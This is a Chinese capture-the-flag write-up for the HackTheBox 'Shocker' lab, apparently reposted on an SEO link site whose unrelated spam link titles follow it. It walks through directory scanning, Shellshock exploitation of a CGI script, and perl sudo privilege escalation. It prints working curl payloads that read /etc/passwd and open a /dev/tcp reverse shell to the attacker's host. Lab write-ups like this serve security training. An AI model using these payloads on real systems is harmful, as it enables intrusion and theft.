当前位置: 首页 > wzjs >正文

帝国网站7.2 pc wap 跳转亚马逊seo推广

帝国网站7.2 pc wap 跳转,亚马逊seo推广,wordpress修改主题教程,车载网络设计是干什么的该靶机主要利用目录扫描如dirsearch,Gobuster,dirb等扫描得到隐藏user.sh脚本,然后利用shellshock漏洞反弹shell,最后发现该用户没有密码,sudo -l查看,利用二进制文件perl提权 靶机介绍 技能要求 Linux基础知识枚举端口和服务 学…

该靶机主要利用目录扫描如dirsearch,Gobuster,dirb等扫描得到隐藏user.sh脚本,然后利用shellshock漏洞反弹shell,最后发现该用户没有密码,sudo -l查看,利用二进制文件perl提权

靶机介绍

技能要求

  • Linux基础知识
  • 枚举端口和服务

学到的东西

  • 利用 shellshock
  • 利用 NOPASSWD

目录标题

  • 一、信息收集
    • 目录扫描
  • 二、边界突破
    • Bash 破壳漏洞Shellshock (CVE-2014-6271)
  • 三、权限提升
    • user.txt
    • root.txt
  • 四、总结
    • 知识点
    • 任务

一、信息收集

靶机ip:10.10.10.56

攻击机ip:10.10.16.26

nmap扫描,开启了80和2222端口

image-20250330141327807

curl下载下来看看

image-20250330141413699

设置域名解析先

image-20250330141547729

目录扫描

disearch没扫描特别重要的目录,有一个**/cgi-bin/目录**

对/cgi-bin/执行扫描

gobuster dir -u  http://shocker.htb/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 -x php,sh,py

直接扫描出来一个sh文件

看一眼提示

二、边界突破

访问80端口

下载此图片

利用工具查看,均未发现泄露信息

访问扫描出来的/cgi-bin/目录,/user.sh,貌似也没有什么信息

该回显和linux下的uptime命令很相识

重新访问一下,可以看到时间发生了变化,说明每一次访问都会自动调用该sh脚本

Bash 破壳漏洞Shellshock (CVE-2014-6271)

参考网站:https://www.sevenlayers.com/index.php/125-exploiting-shellshock

先尝试下面的代码

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.10.56/cgi-bin/user.sh

成功利用,并且发现一个有bash的用户

利用反弹shell

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.16.26/4444 0>&1' http://10.10.10.56/cgi-bin/user.sh

攻击机开启监听执行命令,反弹成功

三、权限提升

user.txt

这里根据以往user.txt的存放位置,可以直接利用命令查看,shelly是上面查看密码得到的用户

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /home/shelly/user.txt' bash -s :'' http://10.10.10.56/cgi-bin/user.sh

扫描成功

image-20250330152305521

那么在靶机里查看一下把,查找成功

image-20250330152242267

root.txt

查看suid

这里很奇怪,执行sudo -l无需输入密码,可能该用户就没有设置密码,总之发现一处root权限的脚本

这里直接执行之后不会有回显,看来是错误的

由于是一个二进制文件,去ctfobins上搜一下,利用此脚本

提权成功

切换交互模式查看

结束

四、总结

知识点

  • Gobuster目录扫描:相比较dirsearch速度更快,可选性高
  • Bash 破壳漏洞Shellshock (CVE-2014-6271):利用到uptime相似脚本user.sh
  • 无密码的perl二进制文件提权:ctfobins下可以查看suid使用方法

任务

1-4

image-20250330153012661

5-8

http://www.dtcms.com/wzjs/399891.html

相关文章:

  • 做动态网站用什么语言重庆关键词优化软件
  • 为什么我的电脑有些网站打不开青青河边草直播免费观看
  • asp.net制作网站开发查域名备案信息查询
  • 小说网站系统怎么做美国最新新闻头条
  • 搜一搜站长工具关键词搜索挖掘爱网站
  • 云速建站可以建个人网站吗营销策划方案公司
  • c 开发微网站开发苏州网站建设制作公司
  • 买个网站多少钱线下推广活动策划方案
  • 做网站建设费用预算广告联盟怎么赚钱
  • it运维是什么工作百度seo快速见效方法
  • 西安做网站微信公司哪家好如何进行网站推广
  • 秦皇岛网站公司廊坊网站推广公司
  • 建设企业网站得花多少营销网店推广的软文
  • 网站首页广告图片伸缩代码又关闭西安发布最新通知
  • 传媒公司商业计划书seo网络推广怎么做
  • 深圳西乡网站建设公司青岛seo关键词
  • 企业网站建设一条龙用广州seo推广获精准访问量
  • 个人做网站有什么坏处我想做app推广代理
  • 上海网站建设-网建知识百度学术论文查重官网入口
  • 织梦网站怎么重新安装网络舆情监测
  • 做网站现在赚钱吗百度一下就会知道了
  • 国外网站案例厦门seo网站推广
  • 专门做网站的公司与外包公司如何屏蔽百度广告推广
  • 网站论坛做斑竹网络公司网页设计
  • 佛山营销网站建设联系方式上海关键词优化的技巧
  • 金色世纪做网站的是哪个岗位关键词排名快速提升
  • 网站推广方法海豚湾陕西优化疫情防控措施
  • 有哪几种语言做的网站软文写作是什么
  • 武汉市疫情最新情况百度首页关键词优化
  • 深圳网站建设公司开发制作网站手机制作网页